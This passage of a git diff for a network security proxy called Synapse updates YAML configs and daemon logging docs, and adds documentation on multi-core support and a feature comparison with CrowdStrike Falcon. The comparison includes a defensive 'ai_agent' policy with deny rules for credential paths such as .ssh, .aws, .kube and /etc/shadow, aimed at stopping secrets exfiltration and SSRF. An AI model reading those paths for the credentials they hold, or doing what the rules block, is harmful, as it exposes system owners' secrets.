seconds + cache_ttl: 300 - # Storage path for certificates and ACME challenge files - # Certificates will be stored in subdirectories per domain - storage_path: "/var/lib/synapse/acme" + # ACME Configuration (Let's Encrypt certificate management - proxy mode only) + acme: + # Enable embedded ACME server for automatic certificate management + enabled: true - # Use Let's Encrypt staging server (for testing) - # Set to true for testing to avoid rate limits - development: false + # Port for ACME server (for HTTP-01 challenges) + # The server always binds to 127.0.0.1 (localhost only) for security + port: 9180 + + # Email address for Let's Encrypt account registration + # Required for certificate issuance + email: null + + # Storage type: "file" or "redis" + # If not set, defaults to "file" or "redis" (if redis_url is set) + storage_type: null + + # Storage path for certificates and ACME challenge files + # Certificates will be stored in subdirectories per domain + storage_path: "/var/lib/synapse/acme" + + # Use Let's Encrypt staging server (for testing) + # Set to true for testing to avoid rate limits + development: false + + # Redis URL for certificate storage (optional) + # If not set, uses the global redis.url configuration + # If set, overrides the global Redis URL for ACME storage + redis_url: null + + # Content Scanning Configuration (proxy mode only) + content_scanning: + # Enable or disable content scanning + enabled: false + + # ClamAV server address + clamav_server: "localhost:3310" + + # Maximum file size to scan in bytes (10MB) + max_file_size: 10485760 + + # Content types to scan (empty means scan all) + scan_content_types: + - "text/html" + - "application/x-www-form-urlencoded" + - "multipart/form-data" + - "application/json" + - "text/plain" + + # Skip scanning for specific file extensions + skip_extensions: [] + + # Wirefilter expression to determine when to scan content + # Default: scan POST and PUT requests + # Examples: + # - "http.request.method eq \"POST\" or http.request.method eq \"PUT\"" + # - "http.request.method eq \"POST\" and http.request.path contains \"/upload\"" + # - "http.request.content_type contains \"multipart/form-data\"" + scan_expression: "http.request.method eq \"POST\" or http.request.method eq \"PUT\"" + + # Internal Services Configuration (proxy mode only) + # Unified HTTP server for captcha verification and ACME certificate management + internal_services: + # Enable the internal services server + # When enabled, provides endpoints for captcha verification and ACME certificate operations + # Disabled in agent mode automatically + enabled: true - # Redis URL for certificate storage (optional) - # If not set, uses the global redis.url configuration - # If set, overrides the global Redis URL for ACME storage - redis_url: null + # Port to bind the internal services server to + port: 9180 + + # IP address to bind to (default: localhost for security) + bind_ip: "127.0.0.1" + + # Available endpoints when enabled: + # - GET /health - Health check endpoint + # - POST /cgi-bin/captcha/verify - Captcha verification (requires captcha configuration) + # - GET /.well-known/acme-challenge - ACME HTTP-01 challenges (requires ACME enabled) + # - GET /cert/expiration - Check all certificate expiration status + # - GET /cert/expiration/:domain - Check specific certificate status + # - POST /cert/renew/:domain - Manually trigger certificate renewal + # + # Environment variable overrides: + # - INTERNAL_SERVICES_ENABLED (true/false) + # - INTERNAL_SERVICES_PORT (port number) + # - INTERNAL_SERVICES_BIND_IP (IP address) diff --git a/config/upstreams.yaml b/config/upstreams.yaml index e192daa..5bbd49d 100644 --- a/config/upstreams.yaml +++ b/config/upstreams.yaml @@ -3,33 +3,44 @@ config: https_proxy_enabled: false sticky_sessions: false global_rate_limit: 100 - global_headers: + # Headers to add to upstream requests (sent to backend servers) + # Example request headers: + # global_request_headers: + # - "X-Forwarded-Proto: https" + # - "X-Real-IP: $remote_addr" + # Headers to add to responses (sent to clients) + global_response_headers: - "Access-Control-Allow-Origin:*" - "Access-Control-Allow-Methods:POST, GET, OPTIONS" - "Access-Control-Max-Age:86400" - "Strict-Transport-Security:max-age=31536000; includeSubDomains; preload" -arxignis_paths: - "/cgi-bin/captcha/verify": - rate_limit: 200 - https_proxy_enabled: false - ssl_enabled: false - servers: - - "127.0.0.1:3001" - - "/.well-known/acme-challenge/*": - rate_limit: 200 - https_proxy_enabled: false - ssl_enabled: false - servers: - - "127.0.0.1:9180" - "/health": - rate_limit: 100 - https_proxy_enabled: false - ssl_enabled: false - disable_access_log: true # Disable access logs for health checks to reduce noise - servers: - - "127.0.0.1:8000" +# internal_paths section is optional +# Default internal paths are automatically initialized but won't route without server configuration +# Uncomment and configure if you need these paths to route to specific services: +# +# internal_paths: +# "/cgi-bin/captcha/verify": +# rate_limit: 200 +# https_proxy_enabled: false +# ssl_enabled: false +# servers: +# - "127.0.0.1:9180" +# +# "/.well-known/acme-challenge/*": +# rate_limit: 200 +# https_proxy_enabled: false +# ssl_enabled: false +# servers: +# - "127.0.0.1:9180" +# +# "/health": +# rate_limit: 100 +# https_proxy_enabled: false +# ssl_enabled: false +# disable_access_log: true +# servers: +# - "127.0.0.1:9180" upstreams: example.com: @@ -43,7 +54,41 @@ upstreams: rate_limit: 200 force_https: true ssl_enabled: true - headers: + # Headers to add to upstream requests (sent to backend servers) + request_headers: - "Host: whoami.arxignis.com" + # Headers to add to responses (sent to clients) + # response_headers: + # - "X-Custom-Header: value" servers: + # Simple string format (weight defaults to 1) - "whoami.arxignis.com:443" + # Or use object format with explicit weight + # - address: "whoami2.arxignis.com:443" + # weight: 3 # This server gets 3x more traffic + + # Example: Upstream with custom timeout settings + # slow-api.example.com: + # paths: + # "/": + # servers: + # - "10.0.0.1:8080" + # ssl_enabled: false + # # Timeout settings (in seconds) - customize for slow backends + # connection_timeout: 30 # Time to establish connection (default: 30) + # read_timeout: 300 # Time to wait for response (default: 120) + # write_timeout: 60 # Time to send request (default: 30) + # idle_timeout: 120 # Keep connection alive for reuse (default: 60) + + # Example: Fast internal service with aggressive timeouts + # internal-api.example.com: + # paths: + # "/api": + # servers: + # - "192.168.1.10:3000" + # - "192.168.1.11:3000" + # ssl_enabled: false + # connection_timeout: 5 # Fast fail for internal services + # read_timeout: 30 # Quick timeout for APIs + # write_timeout: 10 + # idle_timeout: 30 diff --git a/config/upstreams_consul.yaml b/config/upstreams_consul.yaml index 8aa22f3..ed97769 100644 --- a/config/upstreams_consul.yaml +++ b/config/upstreams_consul.yaml @@ -44,14 +44,14 @@ config: # Gen0Sec paths - Global paths that work across ALL hostnames # These paths are evaluated BEFORE hostname-specific routing # Perfect for common endpoints like captcha verification, health checks, APIs, etc. -arxignis_paths: +internal_paths: # Example: Captcha verification endpoint (handled by dedicated service) "/cgi-bin/captcha/verify": rate_limit: 200 force_https: false ssl_enabled: false servers: - - "127.0.0.1:3001" + - "127.0.0.1:9180" # ACME challenge endpoint - routes to embedded ACME server # The embedded ACME server listens on a separate internal port (default: 127.0.0.1:8088) @@ -60,7 +60,7 @@ arxignis_paths: force_https: false ssl_enabled: false servers: - - "127.0.0.1:8088" # Embedded ACME server internal port + - "127.0.0.1:9180" # Embedded ACME server internal port # Upstream servers configuration # Format: hostname -> paths -> servers diff --git a/config/upstreams_kubernetes.yaml b/config/upstreams_kubernetes.yaml index d2e6c4a..06a2021 100644 --- a/config/upstreams_kubernetes.yaml +++ b/config/upstreams_kubernetes.yaml @@ -26,7 +26,7 @@ config: # Gen0Sec paths - Global paths that work across ALL hostnames # These paths are evaluated BEFORE hostname-specific routing and Kubernetes service discovery # Perfect for common endpoints like captcha, health checks, monitoring, etc. -arxignis_paths: +internal_paths: # Example: Captcha verification (handled by dedicated service) "/cgi-bin/captcha/verify": rate_limit: 200 diff --git a/docker-bake.hcl b/docker-bake.hcl index 2da3fa4..4f2c2cc 100644 --- a/docker-bake.hcl +++ b/docker-bake.hcl @@ -16,6 +16,10 @@ target "image" { inherits = ["docker-metadata-action"] context = "." dockerfile = "pkg/docker/Dockerfile" + args = { + REQUIRE_GITHUB_TOKEN = "1" + } + secrets = ["id=github_token,env=GITHUB_TOKEN"] } target "image-local" { diff --git a/docs/DAEMON_MODE.md b/docs/DAEMON_MODE.md index 69e3492..effa843 100644 --- a/docs/DAEMON_MODE.md +++ b/docs/DAEMON_MODE.md @@ -11,7 +11,7 @@ Synapse now supports running as a daemon (background process) using the [daemoni - **Background execution**: Runs as a detached background process - **PID file management**: Creates and manages PID files for process control - **Privilege dropping**: Can drop privileges to a specified user and group after initialization -- **Output redirection**: Redirects stdout and stderr to configurable log files +- **Output redirection**: Redirects access logs and error logs to configurable log files - **Working directory**: Configurable working directory for the daemon - **Signal handling**: Proper signal handling for graceful shutdown @@ -24,8 +24,8 @@ daemon: enabled: false # Enable daemon mode pid_file: "/var/run/synapse.pid" # PID file path working_directory: "/" # Working directory - stdout: "/var/log/synapse.out" # Stdout log file - stderr: "/var/log/synapse.err" # Stderr log file + access_log: "/var/log/synapse/access.log" # Access log file (raw JSON) + error_log: "/var/log/synapse/error.log" # Error log file user: "nobody" # User to run as (optional) group: "daemon" # Group to run as (optional) chown_pid_file: true # Change PID file ownership to user/group @@ -36,8 +36,8 @@ daemon: - `--daemon`, `-d` - Run as daemon in background - `--daemon-pid-file ` - PID file path (default: `/var/run/synapse.pid`) - `--daemon-working-dir ` - Working directory (default: `/`) -- `--daemon-stdout ` - Stdout log file (default: `/var/log/synapse.out`) -- `--daemon-stderr ` - Stderr log file (default: `/var/log/synapse.err`) +- `--daemon-access-log ` - Access log file (default: `/var/log/synapse/access.log`) +- `--daemon-error-log ` - Error log file (default: `/var/log/synapse/error.log`) - `--daemon-user ` - User to run as (e.g., `nobody`) - `--daemon-group ` - Group to run as (e.g., `daemon`) @@ -46,8 +46,8 @@ daemon: - `AX_DAEMON_ENABLED` - Enable daemon mode (true/false) - `AX_DAEMON_PID_FILE` - PID file path - `AX_DAEMON_WORKING_DIRECTORY` - Working directory -- `AX_DAEMON_STDOUT` - Stdout log file -- `AX_DAEMON_STDERR` - Stderr log file +- `AX_DAEMON_ACCESS_LOG` - Access log file +- `AX_DAEMON_ERROR_LOG` - Error log file - `AX_DAEMON_USER` - User to run as - `AX_DAEMON_GROUP` - Group to run as - `AX_DAEMON_CHOWN_PID_FILE` - Change PID file ownership (true/false) @@ -66,8 +66,8 @@ synapse --daemon --iface eth0 --upstream "http://127.0.0.1:8081" --arxignis-api- synapse --daemon \ --daemon-pid-file /var/run/synapse.pid \ --daemon-working-dir / \ - --daemon-stdout /var/log/synapse.out \ - --daemon-stderr /var/log/synapse.err \ + --daemon-access-log /var/log/synapse/access.log \ + --daemon-error-log /var/log/synapse/error.log \ --daemon-user nobody \ --daemon-group daemon \ --iface eth0 --upstream "http://127.0.0.1:8081" --arxignis-api-key "your-key" @@ -81,8 +81,8 @@ daemon: enabled: true pid_file: "/var/run/synapse.pid" working_directory: "/" - stdout: "/var/log/synapse.out" - stderr: "/var/log/synapse.err" + access_log: "/var/log/synapse/access.log" + error_log: "/var/log/synapse/error.log" user: "nobody" group: "daemon" chown_pid_file: true @@ -145,21 +145,21 @@ fi ### Viewing Logs In daemon mode, logs are split: -- **stdout** (`/var/log/synapse.out`) - Application logs (info, debug, warn, error from the logger) -- **stderr** (`/var/log/synapse.err`) - Panic messages and other stderr output +- **access_log** (`/var/log/synapse/access.log`) - Access log JSON (one line per request) +- **error_log** (`/var/log/synapse/error.log`) - All other logs (info/debug/warn/error) ```bash # Tail application logs (primary log file) -tail -f /var/log/synapse.out +tail -f /var/log/synapse/access.log # Tail error output (panics, system errors) -tail -f /var/log/synapse.err +tail -f /var/log/synapse/error.log # View both logs simultaneously -tail -f /var/log/synapse.out /var/log/synapse.err +tail -f /var/log/synapse/access.log /var/log/synapse/error.log ``` -**Note**: When running in daemon mode, the application logger writes to stdout for better log organization. In non-daemon mode, logs go to stderr (standard behavior). +**Note**: Access logs are written to stdout (raw JSON). All other logs go to stderr. ## Security Considerations @@ -196,9 +196,9 @@ sudo mkdir -p /var/run sudo chmod 755 /var/run # Set up log files -sudo touch /var/log/synapse.out /var/log/synapse.err -sudo chown nobody:daemon /var/log/synapse.out /var/log/synapse.err -sudo chmod 644 /var/log/synapse.out /var/log/synapse.err +sudo touch /var/log/synapse/access.log /var/log/synapse/error.log +sudo chown nobody:daemon /var/log/synapse/access.log /var/log/synapse/error.log +sudo chmod 644 /var/log/synapse/access.log /var/log/synapse/error.log ``` ## Systemd Integration @@ -326,4 +326,3 @@ synapse --daemon --config /etc/synapse/config.yaml - [daemonize crate documentation](https://docs.rs/daemonize/latest/daemonize/) - [Synapse README](README.md) - [Configuration Examples](config_example.yaml) - diff --git a/docs/ENVIRONMNET_VARS.md b/docs/ENVIRONMNET_VARS.md index 2346d72..5d6bdcc 100644 --- a/docs/ENVIRONMNET_VARS.md +++ b/docs/ENVIRONMNET_VARS.md @@ -38,8 +38,8 @@ export AX_CONTENT_SCAN_EXPRESSION="http.request.method eq \"POST\" or http.reque export AX_DAEMON_ENABLED="false" export AX_DAEMON_PID_FILE="/var/run/synapse.pid" export AX_DAEMON_WORKING_DIRECTORY="/" -export AX_DAEMON_STDOUT="/var/log/synapse/access.log" -export AX_DAEMON_STDERR="/var/log/synapse/error.log" +export AX_DAEMON_ACCESS_LOG="/var/log/synapse/access.log" +export AX_DAEMON_ERROR_LOG="/var/log/synapse/error.log" export AX_DAEMON_USER="nobody" export AX_DAEMON_GROUP="daemon" export AX_DAEMON_CHOWN_PID_FILE="true" diff --git a/docs/MULTICORE.md b/docs/MULTICORE.md new file mode 100644 index 0000000..ba67f01 --- /dev/null +++ b/docs/MULTICORE.md @@ -0,0 +1,268 @@ +# Multi-Core Support in Moat + +## Overview + +Moat has **full multi-core support** built-in. The application automatically detects available CPU cores and configures the Tokio runtime to utilize all available processing power. + +## Implementation Details + +### Automatic CPU Detection + +The application detects available CPU cores at startup using Rust's standard library: + +```rust +let num_cpus = std::thread::available_parallelism() + .map(|n| n.get()) + .unwrap_or(1); +``` + +### Runtime Configuration + +Moat uses a multi-threaded Tokio runtime configured to match the number of available CPU cores: + +```rust +let mut builder = tokio::runtime::Builder::new_multi_thread(); +builder.worker_threads(num_cpus); +builder.enable_all(); +let runtime = builder.build()?; +``` + +**Location**: `src/main.rs` lines 60-227 + +### Environment Variable Support + +The `TOKIO_WORKER_THREADS` environment variable is automatically set if not already configured: + +```rust +if std::env::var("TOKIO_WORKER_THREADS").is_err() { + unsafe { + std::env::set_var("TOKIO_WORKER_THREADS", num_cpus_early.to_string()); + } +} +``` + +This ensures that: +- The main Tokio runtime uses all cores +- Pingora proxy subsystem inherits the multi-core configuration +- All async operations can execute concurrently + +### Dependencies + +Multi-core support is enabled through Tokio's `rt-multi-thread` feature: + +```toml +tokio = { version = "1", features = [ + "rt-multi-thread", # Enables multi-threaded runtime + "macros", + "net", + "io-util", + "signal", + "sync", +] } +``` + +**Location**: `Cargo.toml` lines 18-25 + +## Performance Characteristics + +### Benchmark Results + +Based on test results on a 16-core system: + +#### CPU-Intensive Workload +- **Single-threaded**: 81.00 ms for 8 tasks +- **Multi-threaded (8 threads)**: 15.92 ms for 8 tasks +- **Speedup**: ~5.1x faster + +#### High Throughput +- **Throughput**: 179,713 requests/second with 8 worker threads +- **Latency**: <6 microseconds per request + +#### Realistic Proxy Workload +- **Throughput**: 3,555 requests/second +- **50 concurrent requests**: completed in 14.06 ms + +### Thread Distribution + +The runtime effectively distributes work across multiple threads: +- IO-bound tasks: Scheduled across worker threads +- CPU-bound tasks: Dispatched to blocking thread pool via `spawn_blocking` + +## Testing + +Comprehensive test suites verify multi-core functionality: + +### Unit Tests (`tests/multicore_test.rs`) +- `test_multiple_workers_are_used`: Verifies tasks run on different threads +- `test_concurrent_task_execution`: Validates concurrent execution +- `test_cpu_intensive_tasks_on_multiple_cores`: Tests CPU work distribution +- `test_parallel_work_distribution`: Measures concurrent task execution + +### Integration Tests (`tests/integration_multicore_test.rs`) +- `test_app_detects_multiple_cores`: Validates CPU detection +- `test_runtime_configuration_matches_main`: Tests runtime setup +- `test_high_concurrency_scenario`: Simulates proxy workload +- `test_mixed_cpu_and_io_workload`: Tests realistic scenarios + +### Benchmarks (`tests/multicore_benchmark.rs`) +- Single-threaded vs multi-threaded comparisons +- CPU-intensive workload tests +- Realistic proxy workload simulation +- Memory allocation concurrency tests + +### Running Tests + +```bash +# Run all multi-core tests +cargo test --test multicore_test --test integration_multicore_test -- --nocapture + +# Run benchmarks +cargo test --test multicore_benchmark -- --nocapture --test-threads=1 + +# Run specific test +cargo test test_multiple_workers_are_used -- --nocapture +``` + +## Configuration + +### Default Behavior + +By default, Moat uses all available CPU cores. No configuration required. + +### Override Worker Threads + +To manually set the number of worker threads: + +```bash +# Use 4 worker threads +export TOKIO_WORKER_THREADS=4 +./synapse --config config.yaml + +# Or inline +TOKIO_WORKER_THREADS=4 ./synapse --config config.yaml +``` + +### Verification + +Check the log output at startup to verify multi-core configuration: + +``` +[DEBUG] main() started, num_cpus=16, TOKIO_WORKER_THREADS=Ok("16") +``` + +## Architecture Components Utilizing Multi-Core + +### 1. HTTP Proxy (Pingora) +- Multiple worker threads handle incoming connections +- Each thread can process requests independently +- Location: `src/http_proxy/start.rs` + +### 2. Background Workers +All workers run concurrently: +- **Certificate Worker**: TLS certificate management +- **Config Worker**: Configuration refresh +- **Log Sender Worker**: Event batching and transmission +- **Threat MMDB Worker**: Threat intelligence updates +- **GeoIP MMDB Worker**: GeoIP database updates + +Location: `src/worker/` + +### 3. BPF Statistics Collection +- Multiple interfaces processed concurrently +- Statistics aggregation runs in parallel +- Location: `src/bpf_stats.rs` + +### 4. TCP Fingerprinting +- Concurrent fingerprint collection across interfaces +- Parallel event processing +- Location: `src/utils/tcp_fingerprint.rs` + +### 5. Access Rules Enforcement +- XDP programs on multiple interfaces +- Concurrent rule evaluation +- Location: `src/access_rules.rs` + +## Performance Recommendations + +### For High Throughput +- **Recommended**: Let the system auto-detect (uses all cores) +- **Manual tuning**: Set `TOKIO_WORKER_THREADS` to match CPU core count + +### For Low Latency +- **Recommended**: Use all cores for parallel processing +- **Consider**: CPU affinity for dedicated worker threads (advanced) + +### For Resource-Constrained Systems +- Manually limit worker threads to conserve resources: + ```bash + TOKIO_WORKER_THREADS=2 ./synapse --config config.yaml + ``` + +### For Container Deployments +The application respects container CPU limits: +- Automatically detects available CPUs in cgroup +- No special configuration needed for Docker/Kubernetes + +## Monitoring Multi-Core Utilization + +### System Level +```bash +# Monitor per-thread CPU usage +top -H -p $(pgrep synapse) + +# Detailed thread information +htop # Press 'H' to show threads +``` + +### Application Level +The application logs worker thread activity: +``` +[DEBUG] Runtime worker thread active, thread_id=ThreadId(42), worker_index=0 +[DEBUG] Runtime worker thread active, thread_id=ThreadId(43), worker_index=1 +``` + +### Metrics +- BPF statistics show per-interface packet processing +- Worker logs indicate concurrent task execution +- Thread IDs in logs demonstrate multi-thread activity + +## Troubleshooting + +### Issue: "Only 1 thread detected" +**Cause**: Running in severely constrained environment +**Solution**: Check container/VM CPU allocation + +### Issue: "Tasks not running concurrently" +**Cause**: `TOKIO_WORKER_THREADS=1` is set +**Solution**: Unset the environment variable or increase value + +### Issue: "High CPU but low throughput" +**Cause**: CPU-bound tasks blocking async threads +**Solution**: Ensure CPU-intensive operations use `spawn_blocking` + +### Issue: "Thread count exceeds CPU count" +**Expected**: Blocking thread pool is separate from worker threads +**Normal**: Additional threads for blocking I/O are expected + +## Future Enhancements + +Potential optimizations: +- [ ] Per-worker metrics and load balancing +- [ ] NUMA-aware thread pinning +- [ ] Dynamic worker thread adjustment based on load +- [ ] Work-stealing queue optimizations +- [ ] CPU affinity for critical paths + +## References + +- [Tokio Runtime Documentation](https://docs.rs/tokio/latest/tokio/runtime/) +- [Multi-threaded Runtime](https://tokio.rs/tokio/topics/runtime#multi-threaded-runtime) +- [Work-stealing Scheduler](https://tokio.rs/tokio/topics/bridging) + +## Summary + +✅ **Multi-core support is fully implemented and tested** +✅ **Automatic CPU detection and configuration** +✅ **Performance scales with CPU core count** +✅ **Comprehensive test coverage with benchmarks** +✅ **Production-ready for high-throughput deployments** diff --git a/features.md b/features.md new file mode 100644 index 0000000..f498db1 --- /dev/null +++ b/features.md @@ -0,0 +1,681 @@ +# Feature Comparison: Synapse vs CrowdStrike Falcon + +## Overview + +This document compares Synapse (moat) capabilities with CrowdStrike Falcon, highlighting which features are available today, which are covered by bpfjailer integration, and which require future development. + +**Key Differences:** +- **CrowdStrike Falcon**: Primarily an EDR (Endpoint Detection & Response) focused on host-level threat detection +- **Synapse**: Network-level security (XDP filtering, WAF, reverse proxy) + host-level MAC via bpfjailer + +## Comparison Table + +| Category | Feature | CrowdStrike | Synapse | bpfjailer | Status | +|----------|---------|-------------|---------|-----------|--------| +| **Network Protection** | | | | | | +| | XDP packet filtering (kernel bypass) | - | ✅ | - | ✅ Have | +| | IP/CIDR blocking | ✅ | ✅ | ✅ | ✅ Have | +| | Rate limiting | ✅ | ✅ | - | ✅ Have | +| | TCP fingerprinting (SYN analysis) | ✅ | ✅ | - | ✅ Have | +| | TLS fingerprinting (JA4+ suite) | ✅ | ✅ | - | ✅ Have | +| | DDoS mitigation | ✅ | ✅ | - | ✅ Have | +| | nftables/iptables fallback | - | ✅ | - | ✅ Have | +| | Network containment | ✅ | ✅ | ✅ | ✅ Have | +| **Host Protection (BPF LSM)** | | | | | | +| | Process tracking (task_storage) | ✅ | - | ✅ | ✅ bpfjailer | +| | File access control (MAC) | ✅ | - | ✅ | ✅ bpfjailer | +| | Exec control (bprm_check) | ✅ | - | ✅ | ✅ bpfjailer | +| | Per-process network rules | ✅ | - | ✅ | ✅ bpfjailer | +| | Jail inheritance (fork/exec) | ✅ | - | ✅ | ✅ bpfjailer | +| | Role-based policies | ✅ | - | ✅ | ✅ bpfjailer | +| | Secrets protection (.ssh, .aws, .kube) | ✅ | - | ✅ | ✅ bpfjailer | +| | Domain-based egress filtering | ✅ | - | ✅ | ✅ bpfjailer | +| | Proxy enforcement | ✅ | - | ✅ | ✅ bpfjailer | +| | Auto-enrollment (exec/cgroup/xattr) | ✅ | - | ✅ | ✅ bpfjailer | +| | Audit events (perf buffer) | ✅ | - | ✅ | ✅ bpfjailer | +| | Daemonless mode (boot pinning) | - | - | ✅ | ✅ bpfjailer | +| | Setuid/ptrace control | ✅ | - | ✅ | ✅ bpfjailer | +| | Module/BPF load control | ✅ | - | ✅ | ✅ bpfjailer | +| **Detection & Analysis** | | | | | | +| | ML behavioral analysis | ✅ | - | - | ❌ Need solution | +| | Indicators of Attack (IOA) | ✅ | - | - | ❌ Need solution | +| | Malware detection (signatures) | ✅ | ✅ ClamAV | - | ✅ Have | +| | Adversary intelligence (245+ profiles) | ✅ | - | - | ❌ Need solution | +| | Automated sandboxing | ✅ | - | - | ❌ Need solution | +| | Memory analysis | ✅ | - | - | ❌ Need solution | +| | Script execution tracking | ✅ | - | ⚠️ | ⚠️ Partial | +| | Registry monitoring (Windows) | ✅ | - | - | N/A (Linux only) | +| **Response Capabilities** | | | | | | +| | Host isolation/containment | ✅ | - | ✅ | ✅ bpfjailer | +| | Process sandboxing | ✅ | - | ✅ | ✅ bpfjailer | +| | Remote shell access | ✅ | - | - | ❌ Need solution | +| | Automated remediation | ✅ | - | - | ❌ Need solution | +| | Threat hunting interface | ✅ | - | - | ❌ Need solution | +| **Operational** | | | | | | +| | Cloud management console | ✅ | ✅ Gen0Sec | - | ✅ Have | +| | Graceful degradation (RFM) | ✅ | - | - | ❌ Need solution | +| | Cross-platform (Win/Mac/Linux) | ✅ | Linux | Linux | ❌ Linux only | +| | Threat intelligence feeds | ✅ | ✅ MMDB | - | ✅ Have | +| | GeoIP filtering (country/ASN/city) | ✅ | ✅ | - | ✅ Have | +| | Hot policy reload | ✅ | ✅ | ✅ | ✅ Have | + +## Legend + +| Symbol | Meaning | +|--------|---------| +| ✅ Have | Feature available in Synapse today | +| ✅ bpfjailer | Feature available via bpfjailer integration | +| ⚠️ Partial | Partially implemented | +| ❌ Need solution | Feature gap requiring future development | +| - | Not applicable or not available | +| N/A | Not applicable to platform | + +## Features by Status + +### ✅ Available Today (Synapse) + +- XDP packet filtering (kernel bypass) +- Multi-backend firewall (XDP > nftables > iptables) +- IP/CIDR allow/block lists +- Rate limiting +- TCP fingerprinting +- TLS fingerprinting (JA4+ complete suite) +- DDoS mitigation +- Malware detection (ClamAV integration) +- Threat intelligence (MMDB) +- GeoIP filtering +- Cloud management (Gen0Sec API) +- WAF (Wirefilter expressions) +- CAPTCHA protection + +### ✅ Available via bpfjailer Integration + +- Process tracking via BPF `task_storage` +- File access control (LSM `file_open` hook) +- Exec control (LSM `bprm_check_security` hook) +- Network control per-process (LSM `socket_bind/connect`) +- Role-based MAC policies +- Secrets protection (block access to `.ssh/`, `.aws/`, `.kube/`, etc.) +- Domain-based egress filtering +- Proxy enforcement for AI agents +- Auto-enrollment by executable path, cgroup, or xattr +- Audit events via perf buffer +- Daemonless mode (BPF programs pinned at boot) +- Jail inheritance through fork/exec +- Setuid/ptrace control +- Module/BPF load blocking + +### ❌ Gaps Requiring Future Development + +| Gap | Difficulty | Notes | +|-----|------------|-------| +| ML behavioral analysis | Hard | Requires ML pipeline, training data, inference engine | +| Indicators of Attack (IOA) | Medium | Rule-based detection patterns, needs research | +| Adversary intelligence | Medium | Could partner or build threat actor database | +| Automated sandboxing | Hard | Isolated execution environment for suspicious code | +| Memory analysis | Hard | Memory forensics, requires kernel integration | +| Remote shell access | Medium | Secure remote access for incident response | +| Automated remediation | Medium | Playbook-based response actions | +| Threat hunting interface | Medium | Query interface for historical data | +| Graceful degradation (RFM) | Easy | Fallback mode when BPF unavailable | +| Cross-platform support | Hard | BPF LSM is Linux-only; Windows/Mac need different approach | + +## Architecture After Integration + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ SYNAPSE UNIFIED AGENT │ +├─────────────────────────────────────────────────────────────────┤ +│ │ +│ ┌─────────────────────────────────────────────────────────┐ │ +│ │ Config & Policy Manager │ │ +│ │ (Gen0Sec API sync + local policy files) │ │ +│ └─────────────────────────────────────────────────────────┘ │ +│ │ │ +│ ┌───────────────┴───────────────┐ │ +│ ▼ ▼ │ +│ ┌─────────────────────┐ ┌─────────────────────────────┐ │ +│ │ XDP Subsystem │ │ LSM Subsystem (bpfjailer) │ │ +│ │ (Network Layer) │ │ (Host Layer) │ │ +│ │ │ │ │ │ +│ │ • IP filtering │ │ • Process enrollment │ │ +│ │ • Rate limiting │ │ • File access MAC │ │ +│ │ • TCP fingerprint │ │ • Network MAC per-process │ │ +│ │ • DDoS mitigation │ │ • Exec control │ │ +│ │ │ │ • Secrets protection │ │ +│ └─────────────────────┘ │ • Domain filtering │ │ +│ │ • Audit logging │ │ +│ └─────────────────────────────┘ │ +│ │ │ +│ ┌───────────────┴───────────────┐ │ +│ ▼ ▼ │ +│ ┌────────────────────────────────────────────────────────────┐│ +│ │ Unified Telemetry ││ +│ │ (BPF stats + LSM audit events + Gen0Sec log sender) ││ +│ └────────────────────────────────────────────────────────────┘│ +└─────────────────────────────────────────────────────────────────┘ +``` + +## AI Agent Security (bpfjailer `ai_agent` role) + +bpfjailer includes a pre-configured `ai_agent` role specifically designed for securing AI workloads: + +```json +{ + "ai_agent": { + "flags": { + "allow_file_access": true, + "allow_network": true, + "allow_exec": false, + "require_proxy": true + }, + "file_paths": [ + {"pattern": "/.ssh/", "allow": false}, + {"pattern": "/.aws/", "allow": false}, + {"pattern": "/.kube/", "allow": false}, + {"pattern": "/.docker/", "allow": false}, + {"pattern": "/etc/shadow", "allow": false}, + {"pattern": "/workspace/", "allow": true} + ], + "ip_rules": [ + {"cidr": "10.0.0.0/8", "allow": false}, + {"cidr": "172.16.0.0/12", "allow": false}, + {"cidr": "192.168.0.0/16", "allow": false} + ], + "domain_rules": [ + {"domain": "api.openai.com", "allow": true}, + {"domain": "api.anthropic.com", "allow": true} + ], + "proxy": { + "address": "127.0.0.1:8080", + "required": true + } + } +} +``` + +This protects against: +- Secrets exfiltration (SSH keys, cloud credentials) +- SSRF to internal networks +- Unauthorized command execution +- Data exfiltration to unapproved domains + +## Roadmap: Planned Features + +### Network-Level Features + +| Feature | Description | Priority | +|---------|-------------|----------| +| XDP Rate Limiting | Connection/packet rate limits per IP directly in BPF, more efficient than userland | High | +| SYN Flood Protection | SYN cookie support or SYN rate limiting in XDP | High | +| Port Knocking | Require specific port sequences before allowing connections | Medium | +| Protocol Detection | Identify and filter by protocol (e.g., block non-HTTP on port 80) | Medium | +| Bandwidth Throttling | Per-IP or subnet bandwidth caps at the XDP level | Low | + +### Intelligence & Detection + +| Feature | Description | Priority | +|---------|-------------|----------| +| Lightweight GeoIP in XDP | Country-level blocking without full threat client | High | +| Connection Behavior Scoring | Track per-IP patterns and auto-block anomalies | High | +| DDoS Pattern Detection | Detect common attack signatures (amplification, reflection) | High | +| JA3/JA4 Fingerprint Blocking | Block known malicious TLS fingerprints at connection time | Medium | + +### Operational Features + +| Feature | Description | Priority | +|---------|-------------|----------| +| Prometheus Metrics Endpoint | Lightweight stats export for monitoring/alerting | High | +| Health Check Endpoint | Simple HTTP endpoint for orchestration (k8s, systemd) | High | +| Config Hot-Reload | Reload access rules via signal without restart | Medium | +| Inter-Agent Sync | Share block lists across agent instances (gossip protocol or via Redis) | Medium | +| Audit Logging Mode | Detailed connection logs for compliance without blocking | Medium | + +### Deployment Modes + +| Feature | Description | Priority | +|---------|-------------|----------| +| Tap/Mirror Mode | Passive monitoring without blocking (useful for initial deployment) | High | +| Fail-Open Option | Continue passing traffic if agent encounters errors | High | + +## Planned Integrations + +### nstealth (Go → Rust port) + +Next-gen WAF utilizing JA4+ network fingerprints for connection-level filtering. Will be ported from Go to Rust for unified codebase. + +| Feature | Description | Status | +|---------|-------------|--------| +| JA4T Fingerprinting | TCP fingerprint extraction (window size, MSS, options, scale) | 🔄 Port to Rust | +| JA4 Fingerprinting | TLS ClientHello fingerprinting | 🔄 Port to Rust | +| JA4H Fingerprinting | HTTP header fingerprinting (unencrypted traffic) | 🔄 Port to Rust | +| JA4L/JA4LS Fingerprinting | Latency-based fingerprinting for distance estimation | 🔄 Port to Rust | +| Drop Mode | Block packets matching malicious fingerprints | 🔄 Port to Rust | +| Forward Mode | Redirect traffic to another interface/IP:port for analysis | 🔄 Port to Rust | +| Whitelist Mode | Only allow packets with known-good fingerprints | 🔄 Port to Rust | +| Wildcard Fingerprint Matching | Match patterns like `8192_*_1460_5` or 